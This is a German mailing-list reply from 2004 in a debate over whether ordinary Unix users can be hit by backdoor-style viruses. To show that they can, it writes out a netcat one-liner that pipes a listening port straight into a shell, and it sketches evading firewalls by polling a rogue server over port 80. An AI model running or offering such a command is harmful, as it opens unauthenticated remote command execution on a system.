Re: Viren (was: Innvative Filesysteme)
Hi,
On Mon, Apr 05, 2004 at 09:50:56PM +1000, Peter Ross wrote:
> On Mon, 5 Apr 2004, Gert Doering wrote:
>
> > Fuer die aktuellen E-Mail-Viren braucht er keinerlei besondere Rechte
> > (ausser "E-Mail versenden").
>
> Soweit ich informiert bin (vielleicht nicht besonders gut), oeffnen die
> scheusslichsten Viren erst einmal ein paar Services, um den Rechner
> "fernbedienen" zu koennen.
"Auch"...
> Das kann ein ordinaerer Nutzer unter Unix nicht,
Oh? "Das war mir neu".
$ ( nc -l -p 5555 | sh ) &
... sollte die Basis-Features einer Backdoor abdecken. Klar, der hat
keine Root-Rechte, und keinen Keyboard-/Monitor-Sniffer, aber letzteres
ist dann trivial.
> zumal, wenn da noch sinnvollerweise eine (vom Normalnutzer nicht
> veraenderbare) Firewall dazugehoert, die keine nichtgenutzten Ports
> zulaesst.
*Das* ist das Zauberwort. Das wuerde Windows-Rechnern genauso helfen.
Ich kann allerdings nicht behaupten, sowas irgendwo zu sehen...
Hilft ausserdem aber auch nicht wirklich - dann wird halt outbound
connected (auf einen rogue-Server auf tcp/80) und darueber Kommandos
abgeholt. "Triviale Uebung".
> Ein Default-Red Hat (zumindest der Enterprise Server, ich weiss nicht
> ueber die Fedora-Heimversionen Bescheid) z.B. blockt allen
> "nichtgenehmigten" Eingangsverkehr.
Einfach umgehbar. Wenn der "evil code" erstmal auf dem Rechner drauf ist,
ist der Rest trivial.
gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany gert@xxxxxxxxxxxxxx
fax: +49-89-35655025 gert@xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
--
To unsubscribe, e-mail: debate-unsubscribe@xxxxxxxxxxxxxx
For additional commands, e-mail: debate-help@xxxxxxxxxxxxxx